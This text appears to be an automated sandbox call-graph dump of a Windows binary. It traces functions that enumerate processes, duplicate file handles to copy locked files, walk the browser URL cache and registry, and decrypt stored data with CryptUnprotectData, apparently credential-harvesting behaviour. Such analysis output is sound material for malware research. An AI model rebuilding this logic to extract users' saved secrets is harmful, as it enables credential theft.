38565->38570 38566->38517 38567 445f5c 38569 40aebe FindClose 38567->38569 38568 40add4 2 API calls 38568->38570 38569->38527 38570->38565 38570->38567 38570->38568 38571 40b2cc 27 API calls 38570->38571 38572 409d1f 6 API calls 38570->38572 38574 445f3a 38570->38574 38974 409b98 GetFileAttributesW 38570->38974 38571->38570 38572->38570 38975 445093 23 API calls 38574->38975 38576->38370 38577->38375 38578->38370 38579->38368 38581 40c775 38580->38581 38977 40b1ab free free 38581->38977 38583 40c788 38978 40b1ab free free 38583->38978 38585 40c790 38979 40b1ab free free 38585->38979 38587 40c798 38588 40aa04 free 38587->38588 38589 40c7a0 38588->38589 38980 40c274 memset 38589->38980 38594 40a8ab 9 API calls 38595 40c7c3 38594->38595 38596 40a8ab 9 API calls 38595->38596 38597 40c7d0 38596->38597 39009 40c3c3 38597->39009 38601 40c877 38610 40bdb0 38601->38610 38602 40c86c 39037 4053fe 37 API calls 38602->39037 38605 40c813 _wcslwr 39035 40c634 47 API calls 38605->39035 38607 40c829 wcslen 38608 40c7e5 38607->38608 38608->38601 38608->38602 39034 40a706 wcslen memcpy 38608->39034 39036 40c634 47 API calls 38608->39036 39171 404363 38610->39171 38612 40bf5d 39188 40440c 38612->39188 38616 40b2cc 27 API calls 38617 40be02 wcslen 38616->38617 38617->38612 38626 40be1e 38617->38626 38618 40be26 wcsncmp 38618->38626 38621 40be7d memset 38622 40bea7 memcpy 38621->38622 38621->38626 38623 40bf11 wcschr 38622->38623 38622->38626 38623->38626 38624 40b2cc 27 API calls 38625 40bef6 _wcsnicmp 38624->38625 38625->38623 38625->38626 38626->38612 38626->38618 38626->38621 38626->38622 38626->38623 38626->38624 38627 40bf43 LocalFree 38626->38627 39191 40bd5d 28 API calls 38626->39191 39192 404423 38626->39192 38627->38626 38628 4135f7 39204 4135e0 38628->39204 38631 40b2cc 27 API calls 38632 41360d 38631->38632 38633 40a804 8 API calls 38632->38633 38634 413613 38633->38634 38635 41363e 38634->38635 38637 40b273 27 API calls 38634->38637 38636 4135e0 FreeLibrary 38635->38636 38638 413643 38636->38638 38639 413625 38637->38639 38638->38397 38639->38635 38640 413648 38639->38640 38641 413658 38640->38641 38642 4135e0 FreeLibrary 38640->38642 38641->38397 38643 413666 38642->38643 38643->38397 38646 4136e2 38644->38646 38645 413827 38843 41366b FreeLibrary 38645->38843 38646->38645 38647 4137ac CoTaskMemFree 38646->38647 38647->38646 39207 4449b9 38648->39207 38651 444c1f 38651->38383 38652 4449b9 35 API calls 38654 444b4b 38652->38654 38653 444c15 38656 4449b9 35 API calls 38653->38656 38654->38653 39227 444972 GetVersionExW 38654->39227 38656->38651 38662 444b8c 38665 40399d 38664->38665 39232 403a16 38665->39232 38668 4039a3 38672 4039f4 38668->38672 38674 403a09 38668->38674 39243 40a02c CreateFileW 38668->39243 38669 403a12 wcsrchr 38669->38390 38673 4099c6 2 API calls 38672->38673 38672->38674 38673->38674 39246 40b1ab free free 38674->39246 38676 414c2e 16 API calls 38675->38676 38677 404048 38676->38677 38678 414c2e 16 API calls 38677->38678 38679 404056 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 404073 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 40408e 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 4040a6 38684->38685 38686 403af5 20 API calls 38685->38686 38687 4040ba 38686->38687 38688 403af5 20 API calls 38687->38688 38689 4040cb 38688->38689 39273 40414f memset 38689->39273 38691 404140 39287 40b1ab free free 38691->39287 38693 4040ec memset 38696 4040e0 38693->38696 38694 404148 38694->38450 38695 4099c6 2 API calls 38695->38696 38696->38691 38696->38693 38696->38695 38697 40a8ab 9 API calls 38696->38697 38697->38696 39300 40a6e6 WideCharToMultiByte 38698->39300 38700 4087ed 39301 4095d9 memset 38700->39301 38703 408953 38703->38450 38704 408809 memset memset memset memset memset 38705 40b2cc 27 API calls 38704->38705 38706 4088a1 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 4088b1 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 4088c0 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 4088d0 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 4088df 38713->38714 38750 40b633 free 38749->38750 38751 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38750->38751 38752 413f00 Process32NextW 38751->38752 38753 413da5 OpenProcess 38752->38753 38754 413f17 CloseHandle 38752->38754 38755 413eb0 38753->38755 38756 413df3 memset 38753->38756 38754->38493 38755->38752 38758 413ebf free 38755->38758 38759 4099f4 3 API calls 38755->38759 39350 413f27 38756->39350 38758->38755 38759->38755 38761 413e37 GetModuleHandleW 38763 413e1f 38761->38763 38764 413e46 38761->38764 38762 413e6a QueryFullProcessImageNameW 38762->38763 38763->38761 38763->38762 39355 413959 38763->39355 39371 413ca4 38763->39371 38764->38763 38766 413ea2 CloseHandle 38766->38755 38768 414c2e 16 API calls 38767->38768 38769 403eb7 38768->38769 38770 414c2e 16 API calls 38769->38770 38771 403ec5 38770->38771 38772 409d1f 6 API calls 38771->38772 38773 403ee2 38772->38773 38774 409d1f 6 API calls 38773->38774 38775 403efd 38774->38775 38776 409d1f 6 API calls 38775->38776 38777 403f15 38776->38777 38778 403af5 20 API calls 38777->38778 38779 403f29 38778->38779 38780 403af5 20 API calls 38779->38780 38781 403f3a 38780->38781 38782 40414f 33 API calls 38781->38782 38788 403f4f 38782->38788 38783 403faf 39384 40b1ab free free 38783->39384 38785 403f5b memset 38785->38788 38786 403fb7 38786->38432 38787 4099c6 2 API calls 38787->38788 38788->38783 38788->38785 38788->38787 38789 40a8ab 9 API calls 38788->38789 38789->38788 38791 414c2e 16 API calls 38790->38791 38792 403d26 38791->38792 38793 414c2e 16 API calls 38792->38793 38794 403d34 38793->38794 38795 409d1f 6 API calls 38794->38795 38796 403d51 38795->38796 38797 409d1f 6 API calls 38796->38797 38798 403d6c 38797->38798 38799 409d1f 6 API calls 38798->38799 38800 403d84 38799->38800 38801 403af5 20 API calls 38800->38801 38802 403d98 38801->38802 38803 403af5 20 API calls 38802->38803 38804 403da9 38803->38804 38805 40414f 33 API calls 38804->38805 38811 403dbe 38805->38811 38806 403e1e 39385 40b1ab free free 38806->39385 38808 403dca memset 38808->38811 38809 403e26 38809->38448 38810 4099c6 2 API calls 38810->38811 38811->38806 38811->38808 38811->38810 38812 40a8ab 9 API calls 38811->38812 38812->38811 38814 414b81 8 API calls 38813->38814 38815 414c40 38814->38815 38816 414c73 memset 38815->38816 39386 409cea 38815->39386 38817 414c94 38816->38817 39389 414592 RegOpenKeyExW 38817->39389 38821 414c64 SHGetSpecialFolderPathW 38822 414d0b 38821->38822 38822->38452 38823 414cc1 38824 414cf4 wcscpy 38823->38824 39390 414bb0 wcscpy 38823->39390 38824->38822 38826 414cd2 39391 4145ac RegQueryValueExW 38826->39391 38828 414ce9 RegCloseKey 38828->38824 38830 409d43 wcscpy 38829->38830 38832 409d62 38829->38832 38831 409719 2 API calls 38830->38831 38833 409d51 wcscat 38831->38833 38834 445389 38832->38834 38833->38832 38835 40ae18 9 API calls 38834->38835 38840 4453c4 38835->38840 38836 40ae51 9 API calls 38836->38840 38837 4453f3 38839 40aebe FindClose 38837->38839 38838 40add4 2 API calls 38838->38840 38841 4453fe 38839->38841 38840->38836 38840->38837 38840->38838 38842 445403 250 API calls 38840->38842 38841->38500 38842->38840 38843->38404 38844->38496 38845->38480 38846->38480 38847->38510 38849 409c89 38848->38849 38849->38535 38850->38564 38852 413d39 38851->38852 38853 413d2f FreeLibrary 38851->38853 38854 40b633 free 38852->38854 38853->38852 38855 413d42 38854->38855 38856 40b633 free 38855->38856 38857 413d4a 38856->38857 38857->38526 38858->38433 38859->38440 38860->38462 38862 44db70 38861->38862 38863 40b6fc memset 38862->38863 38864 409c70 2 API calls 38863->38864 38865 40b732 wcsrchr 38864->38865 38866 40b743 38865->38866 38867 40b746 memset 38865->38867 38866->38867 38868 40b2cc 27 API calls 38867->38868 38869 40b76f 38868->38869 38870 409d1f 6 API calls 38869->38870 38871 40b783 38870->38871 39392 409b98 GetFileAttributesW 38871->39392 38873 40b792 38875 409c70 2 API calls 38873->38875 38887 40b7c2 38873->38887 38877 40b7a5 38875->38877 38880 40b2cc 27 API calls 38877->38880 38878 40b837 CloseHandle 38882 40b83e memset 38878->38882 38879 40b817 39496 409a45 GetTempPathW 38879->39496 38883 40b7b2 38880->38883 39426 40a6e6 WideCharToMultiByte 38882->39426 38884 409d1f 6 API calls 38883->38884 38884->38887 38885 40b827 38885->38882 39393 40bb98 38887->39393 38888 40b866 39427 444432 38888->39427 38891 40bad5 38894 40b04b ??3@YAXPAX 38891->38894 38892 40b273 27 API calls 38893 40b89a 38892->38893 39473 438552 38893->39473 38896 40baf3 38894->38896 38896->38473 38898 40bacd 39476 443d90 38898->39476 38901 40bac6 39526 424f26 122 API calls 38901->39526 38902 40b8bd memset 39517 425413 17 API calls 38902->39517 38905 425413 17 API calls 38923 40b8b8 38905->38923 38908 40a71b MultiByteToWideChar 38908->38923 38909 40a734 MultiByteToWideChar 38909->38923 38912 40b9b5 memcmp 38912->38923 38913 4099c6 2 API calls 38913->38923 38914 404423 37 API calls 38914->38923 38917 4251c4 136 API calls 38917->38923 38918 40bb3e memset memcpy 39527 40a734 MultiByteToWideChar 38918->39527 38920 40bb88 LocalFree 38920->38923 38923->38901 38923->38902 38923->38905 38923->38908 38923->38909 38923->38912 38923->38913 38923->38914 38923->38917 38923->38918 38924 40ba5f memcmp 38923->38924 39518 4253ef 16 API calls 38923->39518 39519 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38923->39519 39520 4253af 17 API calls 38923->39520 39521 4253cf 17 API calls 38923->39521 39522 447280 memset 38923->39522 39523 447960 memset memcpy memcpy memcpy 38923->39523 39524 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38923->39524 39525 447920 memcpy memcpy memcpy 38923->39525 38924->38923 38925->38475 38927 40aebe FindClose 38926->38927 38928 40ae21 38927->38928 38929 4099c6 2 API calls 38928->38929 38930 40ae35 38929->38930 38931 409d1f 6 API calls 38930->38931 38932 40ae49 38931->38932 38932->38539 38934 40ade0 38933->38934 38935 40ae0f 38933->38935 38934->38935 38936 40ade7 wcscmp 38934->38936 38935->38539 38936->38935 38937 40adfe wcscmp 38936->38937 38937->38935 38939 40ae7b FindNextFileW 38938->38939 38940 40ae5c FindFirstFileW 38938->38940 38941 40ae94 38939->38941 38942 40ae8f 38939->38942 38940->38941 38944 40aeb6 38941->38944 38945 409d1f 6 API calls 38941->38945 38943 40aebe FindClose 38942->38943 38943->38941 38944->38539 38945->38944 38947 40aed1 38946->38947 38948 40aec7 FindClose 38946->38948 38947->38401 38948->38947 38950 4099d7 38949->38950 38951 4099da memcpy 38949->38951 38950->38951 38951->38458 38953 40b2cc 27 API calls 38952->38953 38954 44543f 38953->38954 38955 409d1f 6 API calls 38954->38955 38956 44544f 38955->38956 39921 409b98 GetFileAttributesW 38956->39921 38958 44545e 38959 445476 38958->38959 38960 40b6ef 249 API calls 38958->38960 38961 40b2cc 27 API calls 38959->38961 38960->38959 38962 445482 38961->38962 38963 409d1f 6 API calls 38962->38963 38964 445492 38963->38964 39922 409b98 GetFileAttributesW 38964->39922 38966 4454a1 38967 4454b9 38966->38967 38968 40b6ef 249 API calls 38966->38968 38967->38478 38968->38967 38969->38477 38970->38501 38971->38507 38972->38542 38973->38522 38974->38570 38975->38570 38976->38553 38977->38583 38978->38585 38979->38587 38981 414c2e 16 API calls 38980->38981 38982 40c2ae 38981->38982 39038 40c1d3 38982->39038 38987 40c3be 39004 40a8ab 38987->39004 38988 40afcf 2 API calls 38989 40c2fd FindFirstUrlCacheEntryW 38988->38989 38990 40c3b6 38989->38990 38991 40c31e wcschr 38989->38991 38992 40b04b ??3@YAXPAX 38990->38992 38993 40c331 38991->38993 38994 40c35e FindNextUrlCacheEntryW 38991->38994 38992->38987 38996 40a8ab 9 API calls 38993->38996 38994->38991 38995 40c373 GetLastError 38994->38995 38997 40c3ad FindCloseUrlCache 38995->38997 38998 40c37e 38995->38998 38999 40c33e wcschr 38996->38999 38997->38990 39000 40afcf 2 API calls 38998->39000 38999->38994 39001 40c34f 38999->39001 39002 40c391 FindNextUrlCacheEntryW 39000->39002 39003 40a8ab 9 API calls 39001->39003 39002->38991 39002->38997 39003->38994 39132 40a97a 39004->39132 39007 40a8cc 39007->38594 39008 40a8d0 7 API calls 39008->39007 39137 40b1ab free free 39009->39137 39011 40c3dd 39012 40b2cc 27 API calls 39011->39012 39013 40c3e7 39012->39013 39138 414592 RegOpenKeyExW 39013->39138 39015 40c3f4 39016 40c50e 39015->39016 39017 40c3ff 39015->39017 39031 405337 39016->39031 39018 40a9ce 4 API calls 39017->39018 39019 40c418 memset 39018->39019 39139 40aa1d 39019->39139 39022 40c471 39024 40c47a _wcsupr 39022->39024 39023 40c505 RegCloseKey 39023->39016 39025 40a8d0 7 API calls 39024->39025 39026 40c498 39025->39026 39027 40a8d0 7 API calls 39026->39027 39028 40c4ac memset 39027->39028 39029 40aa1d 39028->39029 39030 40c4e4 RegEnumValueW 39029->39030 39030->39023 39030->39024 39141 405220 39031->39141 39033 405340 39033->38608 39034->38605 39035->38607 39036->38608 39037->38601 39039 40ae18 9 API calls 39038->39039 39045 40c210 39039->39045 39040 40ae51 9 API calls 39040->39045 39041 40c264 39042 40aebe FindClose 39041->39042 39044 40c26f 39042->39044 39043 40add4 2 API calls 39043->39045 39050 40e5ed memset memset 39044->39050 39045->39040 39045->39041 39045->39043 39046 40c231 _wcsicmp 39045->39046 39047 40c1d3 34 API calls 39045->39047 39046->39045 39048 40c248 39046->39048 39047->39045 39063 40c084 21 API calls 39048->39063 39051 414c2e 16 API calls 39050->39051 39052 40e63f 39051->39052 39053 409d1f 6 API calls 39052->39053 39054 40e658 39053->39054 39064 409b98 GetFileAttributesW 39054->39064 39056 40e667 39057 409d1f 6 API calls 39056->39057 39059 40e680 39056->39059 39057->39059 39065 409b98 GetFileAttributesW 39059->39065 39060 40e68f 39061 40c2d8 39060->39061 39066 40e4b2 39060->39066 39061->38987 39061->38988 39063->39045 39064->39056 39065->39060 39087 40e01e 39066->39087 39068 40e593 39069 40e5b0 39068->39069 39070 40e59c DeleteFileW 39068->39070 39071 40b04b ??3@YAXPAX 39069->39071 39070->39069 39073 40e5bb 39071->39073 39072 40e521 39072->39068 39110 40e175 39072->39110 39075 40e5c4 CloseHandle 39073->39075 39076 40e5cc 39073->39076 39075->39076 39079 40b633 free 39076->39079 39077 40e540 39078 40e573 39077->39078 39130 40e2ab 30 API calls 39077->39130 39080 40e584 39078->39080 39081 40e57c CloseHandle 39078->39081 39082 40e5db 39079->39082 39131 40b1ab free free 39080->39131 39081->39080 39083 40b633 free 39082->39083 39085 40e5e3 39083->39085 39085->39061 39088 406214 22 API calls 39087->39088 39089 40e03c 39088->39089 39090 40e16b 39089->39090 39091 40dd85 60 API calls 39089->39091 39090->39072 39092 40e06b 39091->39092 39092->39090 39093 40afcf ??2@YAPAXI ??3@YAXPAX 39092->39093 39094 40e08d OpenProcess 39093->39094 39095 40e0a4 GetCurrentProcess DuplicateHandle 39094->39095 39099 40e152 39094->39099 39096 40e0d0 GetFileSize 39095->39096 39097 40e14a CloseHandle 39095->39097 39100 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39096->39100 39097->39099 39098 40e160 39102 40b04b ??3@YAXPAX 39098->39102 39099->39098 39101 406214 22 API calls 39099->39101 39103 40e0ea 39100->39103 39101->39098 39102->39090 39104 4096dc CreateFileW 39103->39104 39105 40e0f1 CreateFileMappingW 39104->39105 39106 40e140 CloseHandle CloseHandle 39105->39106 39107 40e10b MapViewOfFile 39105->39107 39106->39097 39108 40e13b CloseHandle 39107->39108 39109 40e11f WriteFile UnmapViewOfFile 39107->39109 39108->39106 39109->39108 39111 40e18c 39110->39111 39112 406b90 11 API calls 39111->39112 39113 40e19f 39112->39113 39114 40e1a7 memset 39113->39114 39115 40e299 39113->39115 39121 40e1e8 39114->39121 39116 4069a3 ??3@YAXPAX free 39115->39116 39117 40e2a4 39116->39117 39117->39077 39118 406e8f 13 API calls 39118->39121 39119 406b53 SetFilePointerEx ReadFile 39119->39121 39120 40dd50 _wcsicmp 39120->39121 39121->39118 39121->39119 39121->39120 39122 40e283 39121->39122 39126 40742e 8 API calls 39121->39126 39127 40aae3 wcslen wcslen _memicmp 39121->39127 39128 40e244 _snwprintf 39121->39128 39123 40e291 39122->39123 39124 40e288 free 39122->39124 39125 40aa04 free 39123->39125 39124->39123 39125->39115 39126->39121 39127->39121 39129 40a8d0 7 API calls 39128->39129 39129->39121 39130->39077 39131->39068 39133 40a980 39132->39133 39134 40a8bb 39133->39134 39135 40a995 _wcsicmp 39133->39135 39136 40a99c wcscmp 39133->39136 39134->39007 39134->39008 39135->39133 39136->39133 39137->39011 39138->39015 39140 40aa23 RegEnumValueW 39139->39140 39140->39022 39140->39023 39142 40522a 39141->39142 39167 405329 39141->39167 39143 40b2cc 27 API calls 39142->39143 39144 405234 39143->39144 39145 40a804 8 API calls 39144->39145 39146 40523a 39145->39146 39168 40b273 39146->39168 39148 405248 _mbscpy _mbscat 39149 40526c 39148->39149 39150 40b273 27 API calls 39149->39150 39151 405279 39150->39151 39152 40b273 27 API calls 39151->39152 39153 40528f 39152->39153 39154 40b273 27 API calls 39153->39154 39155 4052a5 39154->39155 39156 40b273 27 API calls 39155->39156 39157 4052bb 39156->39157 39158 40b273 27 API calls 39157->39158 39159 4052d1 39158->39159 39160 40b273 27 API calls 39159->39160 39161 4052e7 39160->39161 39162 40b273 27 API calls 39161->39162 39163 4052fd 39162->39163 39164 40b273 27 API calls 39163->39164 39165 405313 39164->39165 39166 40b273 27 API calls 39165->39166 39166->39167 39167->39033 39169 40b58d 27 API calls 39168->39169 39170 40b18c 39169->39170 39170->39148 39172 40440c FreeLibrary 39171->39172 39173 40436d 39172->39173 39174 40a804 8 API calls 39173->39174 39175 404377 39174->39175 39176 4043f7 39175->39176 39177 40b273 27 API calls 39175->39177 39176->38612 39176->38616 39178 40438d 39177->39178 39179 40b273 27 API calls 39178->39179 39180 4043a7 39179->39180 39181 40b273 27 API calls 39180->39181 39182 4043ba 39181->39182 39183 40b273 27 API calls 39182->39183 39184 4043ce 39183->39184 39185 40b273 27 API calls 39184->39185 39186 4043e2 39185->39186 39186->39176 39187 40440c FreeLibrary 39186->39187 39187->39176 39189 404413 FreeLibrary 39188->39189 39190 40441e 39188->39190 39189->39190 39190->38628 39191->38626 39193 40447e 39192->39193 39194 40442e 39192->39194 39195 404485 CryptUnprotectData 39193->39195 39196 40449c 39193->39196 39197 40b2cc 27 API calls 39194->39197 39195->39196 39196->38626 39198 404438 39197->39198 39199 40a804 8 API calls 39198->39199 39200 40443e 39199->39200 39201 40444f 39200->39201 39202 40b273 27 API calls 39200->39202 39201->39193 39203 404475 FreeLibrary 39201->39203 39202->39201 39203->39193 39205 4135f6 39204->39205 39206 4135eb FreeLibrary 39204->39206 39205->38631 39206->39205 39208 4449c4 39207->39208 39226 444a48 39207->39226 39209 40b2cc 27 API calls 39208->39209 39210 4449cb 39209->39210 39211 40a804 8 API calls 39210->39211 39212 4449d1 39211->39212 39226->38651 39226->38652 39227->38662 39233 403a29 39232->39233 39247 403bed memset memset 39233->39247 39235 403a2f 39236 403ae7 39235->39236 39237 403a3f memset 39235->39237 39240 409d1f 6 API calls 39235->39240 39241 409b98 GetFileAttributesW 39235->39241 39242 40a8d0 7 API calls 39235->39242 39260 40b1ab free free 39236->39260 39237->39235 39239 403aef 39239->38668 39240->39235 39241->39235 39242->39235 39244 40a051 GetFileTime CloseHandle 39243->39244 39245 4039ca CompareFileTime 39243->39245 39244->39245 39245->38668 39246->38669 39248 414c2e 16 API calls 39247->39248 39249 403c38 39248->39249 39250 409719 2 API calls 39249->39250 39251 403c3f wcscat 39250->39251 39252 414c2e 16 API calls 39251->39252 39253 403c61 39252->39253 39254 409719 2 API calls 39253->39254 39255 403c68 wcscat 39254->39255 39261 403af5 39255->39261 39258 403af5 20 API calls 39259 403c95 39258->39259 39259->39235 39260->39239 39262 403b02 39261->39262 39263 40ae18 9 API calls 39262->39263 39269 403b37 39263->39269 39264 40ae51 9 API calls 39264->39269 39265 403bdb 39266 40aebe FindClose 39265->39266 39268 403be6 39266->39268 39267 40add4 wcscmp wcscmp 39267->39269 39268->39258 39269->39264 39269->39265 39269->39267 39270 40ae18 9 API calls 39269->39270 39271 40aebe FindClose 39269->39271 39272 40a8d0 7 API calls 39269->39272 39270->39269 39271->39269 39272->39269 39274 409d1f 6 API calls 39273->39274 39275 404190 39274->39275 39288 409b98 GetFileAttributesW 39275->39288 39277 40419c 39278 4041a7 6 API calls 39277->39278 39279 40435c 39277->39279 39280 40424f 39278->39280 39279->38696 39280->39279 39282 40425e memset 39280->39282 39284 409d1f 6 API calls 39280->39284 39285 40a8ab 9 API calls 39280->39285 39289 414842 39280->39289 39282->39280 39283 404296 wcscpy 39282->39283 39283->39280 39284->39280 39286 4042b6 memset memset _snwprintf wcscpy 39285->39286 39286->39280 39287->38694 39288->39277 39292 41443e 39289->39292 39291 414866 39291->39280 39293 41444b 39292->39293 39294 414451 39293->39294 39295 4144a3 GetPrivateProfileStringW 39293->39295 39296 414491 39294->39296 39297 414455 wcschr 39294->39297 39295->39291 39299 414495 WritePrivateProfileStringW 39296->39299 39297->39296 39298 414463 _snwprintf 39297->39298 39298->39299 39299->39291 39300->38700 39302 40b2cc 27 API calls 39301->39302 39303 409615 39302->39303 39304 409d1f 6 API calls 39303->39304 39305 409625 39304->39305 39328 409b98 GetFileAttributesW 39305->39328 39307 409634 39310 409648 39307->39310 39345 4091b8 238 API calls 39307->39345 39309 40b2cc 27 API calls 39311 40965d 39309->39311 39310->39309 39312 408801 39310->39312 39313 409d1f 6 API calls 39311->39313 39312->38703 39312->38704 39314 40966d 39313->39314 39329 409b98 GetFileAttributesW 39314->39329 39316 40967c 39316->39312 39330 409529 39316->39330 39328->39307 39329->39316 39346 4096c3 CreateFileW 39330->39346 39332 409543 39333 4095cd 39332->39333 39334 409550 GetFileSize 39332->39334 39333->39312 39335 409577 CloseHandle 39334->39335 39336 40955f 39334->39336 39335->39333 39341 409585 39335->39341 39337 40afcf 2 API calls 39336->39337 39341->39333 39345->39310 39346->39332 39377 413f4f 39350->39377 39353 413f37 K32GetModuleFileNameExW 39354 413f4a 39353->39354 39354->38763 39356 413969 wcscpy 39355->39356 39357 41396c wcschr 39355->39357 39368 413a3a 39356->39368 39357->39356 39359 41398e 39357->39359 39381 4097f7 wcslen wcslen _memicmp 39359->39381 39361 41399a 39362 4139a4 memset 39361->39362 39363 4139e6 39361->39363 39382 409dd5 GetWindowsDirectoryW wcscpy 39362->39382 39364 413a31 wcscpy 39363->39364 39365 4139ec memset 39363->39365 39364->39368 39383 409dd5 GetWindowsDirectoryW wcscpy 39365->39383 39368->38763 39369 4139c9 wcscpy wcscat 39369->39368 39370 413a11 memcpy wcscat 39370->39368 39372 413cb0 GetModuleHandleW 39371->39372 39373 413cda 39371->39373 39372->39373 39374 413cbf 39372->39374 39375 413ce3 GetProcessTimes 39373->39375 39376 413cf6 39373->39376 39374->39373 39375->38766 39376->38766 39378 413f2f 39377->39378 39379 413f54 39377->39379 39378->39353 39378->39354 39380 40a804 8 API calls 39379->39380 39380->39378 39381->39361 39382->39369 39383->39370 39384->38786 39385->38809 39387 409cf9 GetVersionExW 39386->39387 39388 409d0a 39386->39388 39387->39388 39388->38816 39388->38821 39389->38823 39390->38826 39391->38828 39392->38873 39394 40bba5 39393->39394 39528 40cc26 39394->39528 39397 40bd4b 39549 40cc0c 39397->39549 39402 40b2cc 27 API calls 39403 40bbef 39402->39403 39556 40ccf0 _wcsicmp 39403->39556 39405 40bbf5 39405->39397 39557 40ccb4 6 API calls 39405->39557 39407 40bc26 39408 40cf04 17 API calls 39407->39408 39409 40bc2e 39408->39409 39410 40bd43 39409->39410 39411 40b2cc 27 API calls 39409->39411 39412 40cc0c 4 API calls 39410->39412 39413 40bc40 39411->39413 39412->39397 39558 40ccf0 _wcsicmp 39413->39558 39415 40bc46 39415->39410 39416 40bc61 memset memset WideCharToMultiByte 39415->39416 39559 40103c strlen 39416->39559 39418 40bcc0 39419 40b273 27 API calls 39418->39419 39420 40bcd0 memcmp 39419->39420 39420->39410 39421 40bce2 39420->39421 39422 404423 37 API calls 39421->39422 39423 40bd10 39422->39423 39423->39410 39424 40bd3a LocalFree 39423->39424 39425 40bd1f memcpy 39423->39425 39424->39410 39425->39424 39426->38888 39428 4438b5 11 API calls 39427->39428 39429 44444c 39428->39429 39430 40b879 39429->39430 39619 415a6d 39429->39619 39430->38891 39430->38892 39432 4442e6 11 API calls 39434 44469e 39432->39434 39433 444486 39435 4444b9 memcpy 39433->39435 39472 4444a4 39433->39472 39434->39430 39437 443d90 110 API calls 39434->39437 39623 415258 39435->39623 39437->39430 39438 444524 39439 444541 39438->39439 39440 44452a 39438->39440 39626 444316 39439->39626 39441 416935 16 API calls 39440->39441 39441->39472 39444 444316 18 API calls 39445 444563 39444->39445 39446 444316 18 API calls 39445->39446 39447 44456f 39446->39447 39448 444316 18 API calls 39447->39448 39449 44457f 39448->39449 39449->39472 39640 432d4e 39449->39640 39452 444316 18 API calls 39453 4445b0 39452->39453 39644 41eed2 39453->39644 39455 4445cf 39456 4445d6 39455->39456 39457 4445ee 39455->39457 39460 416935 16 API calls 39456->39460 39660 43302c 39457->39660 39460->39472 39461 43302c memset 39472->39432 39755 438460 39473->39755 39475 40b8a4 39475->38898 39499 4251c4 39475->39499 39477 443da3 39476->39477 39495 443db6 39476->39495 39843 41707a 11 API calls 39477->39843 39479 443da8 39480 443dbc 39479->39480 39481 443dac 39479->39481 39845 4300e8 memset memset memcpy 39480->39845 39844 4446ea 11 API calls 39481->39844 39484 443de0 39485 416935 16 API calls 39484->39485 39485->39495 39486 443dce 39486->39484 39490 443e22 39486->39490 39487 443e5a 39847 4300e8 memset memset memcpy 39487->39847 39490->39487 39846 41f0ac 102 API calls 39490->39846 39491 443e63 39492 416935 16 API calls 39491->39492 39493 443f3b 39492->39493 39493->39495 39848 42320f memset memcpy 39493->39848 39495->38891 39497 409a74 GetTempFileNameW 39496->39497 39498 409a66 GetWindowsDirectoryW 39496->39498 39497->38885 39498->39497 39849 424f07 39499->39849 39501 4251e4 39502 4251f7 39501->39502 39503 4251e8 39501->39503 39857 4250f8 39502->39857 39856 4446ea 11 API calls 39503->39856 39505 4251f2 39505->38923 39507 425209 39509 425249 39507->39509 39513 4250f8 126 API calls 39507->39513 39514 425287 39507->39514 39865 4384e9 134 API calls 39507->39865 39866 424f74 123 API calls 39507->39866 39508 415c7d 16 API calls 39508->39505 39509->39514 39867 424ff0 13 API calls 39509->39867 39513->39507 39514->39508 39515 425266 39515->39514 39868 415be9 memcpy 39515->39868 39517->38923 39518->38923 39519->38923 39520->38923 39521->38923 39522->38923 39523->38923 39524->38923 39525->38923 39526->38898 39527->38920 39560 4096c3 CreateFileW 39528->39560 39530 40cc34 39531 40cc3d GetFileSize 39530->39531 39532 40bbca 39530->39532 39533 40afcf 2 API calls 39531->39533 39532->39397 39540 40cf04 39532->39540 39534 40cc64 39533->39534 39561 40a2ef ReadFile 39534->39561 39536 40cc71 39562 40ab4a MultiByteToWideChar 39536->39562 39538 40cc95 CloseHandle 39539 40b04b ??3@YAXPAX 39538->39539 39539->39532 39541 40b633 free 39540->39541 39542 40cf14 39541->39542 39568 40b1ab free free 39542->39568 39544 40cf1b 39546 40cfef 39544->39546 39548 40bbdd 39544->39548 39569 40cd4b 39544->39569 39547 40cd4b 14 API calls 39546->39547 39547->39548 39548->39397 39548->39402 39550 40b633 free 39549->39550 39551 40cc15 39550->39551 39552 40aa04 free 39551->39552 39553 40cc1d 39552->39553 39618 40b1ab free free 39553->39618 39555 40b7d4 memset CreateFileW 39555->38878 39555->38879 39556->39405 39557->39407 39558->39415 39559->39418 39560->39530 39561->39536 39563 40ab6b 39562->39563 39567 40ab93 39562->39567 39564 40a9ce 4 API calls 39563->39564 39565 40ab74 39564->39565 39566 40ab7c MultiByteToWideChar 39565->39566 39566->39567 39567->39538 39568->39544 39570 40cd7b 39569->39570 39603 40aa29 39570->39603 39572 40cef5 39573 40aa04 free 39572->39573 39574 40cefd 39573->39574 39574->39544 39576 40aa29 6 API calls 39577 40ce1d 39576->39577 39578 40aa29 6 API calls 39577->39578 39579 40ce3e 39578->39579 39580 40ce6a 39579->39580 39611 40abb7 wcslen memmove 39579->39611 39581 40ce9f 39580->39581 39614 40abb7 wcslen memmove 39580->39614 39583 40a8d0 7 API calls 39581->39583 39586 40ceb5 39583->39586 39584 40ce56 39612 40aa71 wcslen 39584->39612 39592 40a8d0 7 API calls 39586->39592 39588 40ce8b 39615 40aa71 wcslen 39588->39615 39589 40ce5e 39613 40abb7 wcslen memmove 39589->39613 39595 40cecb 39592->39595 39593 40ce93 39616 40abb7 wcslen memmove 39593->39616 39617 40d00b malloc memcpy free free 39595->39617 39597 40cedd 39598 40aa04 free 39597->39598 39599 40cee5 39598->39599 39600 40aa04 free 39599->39600 39601 40ceed 39600->39601 39602 40aa04 free 39601->39602 39602->39572 39604 40aa33 39603->39604 39610 40aa63 39603->39610 39605 40aa44 39604->39605 39606 40aa38 wcslen 39604->39606 39607 40a9ce malloc memcpy free free 39605->39607 39606->39605 39608 40aa4d 39607->39608 39609 40aa51 memcpy 39608->39609 39608->39610 39609->39610 39610->39572 39610->39576 39611->39584 39612->39589 39613->39580 39614->39588 39615->39593 39616->39581 39617->39597 39618->39555 39620 415a77 39619->39620 39621 415a8d 39620->39621 39622 415a7e 